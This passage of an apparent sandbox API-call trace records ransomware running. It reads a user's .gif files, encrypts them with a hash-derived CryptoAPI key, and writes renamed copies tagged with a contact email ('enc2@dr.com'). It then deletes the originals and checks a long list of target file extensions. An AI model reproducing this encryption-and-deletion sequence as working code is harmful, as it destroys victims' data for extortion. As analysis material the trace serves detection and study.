sk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.819] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.819] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.819] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.825] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1603d, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x1603d, lpOverlapped=0x0) returned 1
	[0197.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.829] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0197.831] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.831] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.832] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.832] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb91f0) returned 1
	[0197.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.832] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1603d, dwBufLen=0x1603d | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x16040) returned 1
	[0197.835] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.836] RtlMoveMemory (in: Destination=0xff31c8, Source=0xfdd180, Length=0x1603d | out: Destination=0xff31c8) 
	[0197.836] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.836] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff31c8*, pdwDataLen=0x18aefc*=0x1603d, dwBufLen=0x16040 | out: pbData=0xff31c8*, pdwDataLen=0x18aefc*=0x16040) returned 1
	[0197.838] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.839] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0197.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.839] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.839] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0197.839] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.839] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.840] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.840] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.841] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 105
	[0197.841] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.842] WriteFile (in: hFile=0x388, lpBuffer=0xff31c8*, nNumberOfBytesToWrite=0x16040, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff31c8*, lpNumberOfBytesWritten=0x18b358*=0x16040, lpOverlapped=0x0) returned 1
	[0197.848] CloseHandle (hObject=0x388) returned 1
	[0197.848] CloseHandle (hObject=0x2c0) returned 1
	[0197.848] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif")) returned 1
	[0197.919] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\quwg7c_8dv6tfar.gif")) returned 0
	[0197.919] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0286d00, ftCreationTime.dwHighDateTime=0x1d96fe8, ftLastAccessTime.dwLowDateTime=0x9cc4ba50, ftLastAccessTime.dwHighDateTime=0x1d97232, ftLastWriteTime.dwLowDateTime=0x9cc4ba50, ftLastWriteTime.dwHighDateTime=0x1d97232, nFileSizeHigh=0x0, nFileSizeLow=0x12326, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQwc5LRtJgP.gif", cAlternateFileName="WQWC5L~1.GIF")) returned 1
	[0197.919] lstrcmpW (lpString1="wQwc5LRtJgP.gif", lpString2="..") returned 1
	[0197.919] lstrcmpW (lpString1="wQwc5LRtJgP.gif", lpString2=".") returned 1
	[0197.919] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.920] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="wQwc5LRtJgP.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\wQwc5LRtJgP.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\wQwc5LRtJgP.gif"
	[0197.920] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\wQwc5LRtJgP.gif") returned 59
	[0197.920] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.920] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\wQwc5LRtJgP.gif", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif") returned 0x3b
	[0197.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.920] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.920] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif"
	[0197.921] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif") returned 59
	[0197.921] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.921] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0197.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.922] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.922] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.922] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.922] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.927] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x12326, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x12326, lpOverlapped=0x0) returned 1
	[0197.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.930] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcaef0) returned 1
	[0197.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.933] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.934] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.934] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9670) returned 1
	[0197.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.934] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x12326, dwBufLen=0x12326 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x12330) returned 1
	[0197.937] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.937] RtlMoveMemory (in: Destination=0xfef4b0, Source=0xfdd180, Length=0x12326 | out: Destination=0xfef4b0) 
	[0197.937] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.937] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfef4b0*, pdwDataLen=0x18aefc*=0x12326, dwBufLen=0x12330 | out: pbData=0xfef4b0*, pdwDataLen=0x18aefc*=0x12330) returned 1
	[0197.940] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.940] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0197.940] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.940] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.940] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.941] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0197.941] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.941] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.941] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.941] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.943] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0197.943] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.943] WriteFile (in: hFile=0x388, lpBuffer=0xfef4b0*, nNumberOfBytesToWrite=0x12330, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfef4b0*, lpNumberOfBytesWritten=0x18b358*=0x12330, lpOverlapped=0x0) returned 1
	[0197.955] CloseHandle (hObject=0x388) returned 1
	[0197.955] CloseHandle (hObject=0x2c0) returned 1
	[0197.955] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif")) returned 1
	[0197.964] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\wqwc5lrtjgp.gif")) returned 0
	[0197.964] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0286d00, ftCreationTime.dwHighDateTime=0x1d96fe8, ftLastAccessTime.dwLowDateTime=0x9cc4ba50, ftLastAccessTime.dwHighDateTime=0x1d97232, ftLastWriteTime.dwLowDateTime=0x9cc4ba50, ftLastWriteTime.dwHighDateTime=0x1d97232, nFileSizeHigh=0x0, nFileSizeLow=0x12326, dwReserved0=0x0, dwReserved1=0x0, cFileName="wQwc5LRtJgP.gif", cAlternateFileName="WQWC5L~1.GIF")) returned 0
	[0197.964] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0197.964] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
